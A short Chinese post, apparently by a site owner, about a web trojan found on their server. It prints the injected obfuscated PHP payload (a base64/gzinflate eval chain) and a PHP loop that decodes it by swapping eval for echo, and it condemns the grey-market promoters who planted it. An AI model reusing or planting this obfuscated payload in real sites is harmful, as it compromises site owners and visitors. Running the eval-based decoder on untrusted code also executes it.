服务器被挂马了.发现是加密的代码.
通过以下代码进行解密
<?php
$a = "eval(gzinflate(base64_decode('bVFvS4NAHH4v+B1EZCos3dYKtiEtlrWgljkLIsbhvN92R3qK3moVfffuNMpgr+54eP7eqUoFHHGaAUppRrnVsyeqoioEYgylpc9yxoHxo+i9gLHGYc9dwrN0kpC4FEpvux4c9we6FOGYA8KwiXdp4/iRM0CCZJlBODMlxYguBFC+Qql5mk44L8auy/mLU2UnpyMnYeNRz9UnmmCSvOKIxRm0mLpjoKUfPvrhszmPogDN75aRuWqhwTwQ95tLcyXTfsqjbO1taApoK6YmDVZZf10c3aUMw94pSHEmcz0R9Jvv6J1dmXrt7PsHP3xCyyi8XlyJeL2D8yym7B+nOdHi/NY3V82bQkJyrVWqBg1h3hcbD27Q5EvI6rKIZE2BYQv2RZpjsEzX7NZy266Zmx1LOM2ZJr/0raQc4nUKVm1QT7FV5VNVpgnJctyCu73hcNhU/BI2B9R1vGQkcUIAyRIGpqVEvgE=')));";
function decodephp($a)
{
$max_level = 300; //最大层数
for ($i = 0; $i < $max_level; $i++) {
ob_start();
eval(str_replace('eval', 'echo', $a));
$a = ob_get_clean();
if (strpos($a, 'eval(gzinflate(base64_decode') === false) {
return $a;
}
}
}
echo decodephp($a);
?>
挂马的目的是推广灰色产业,鄙视一下这些人.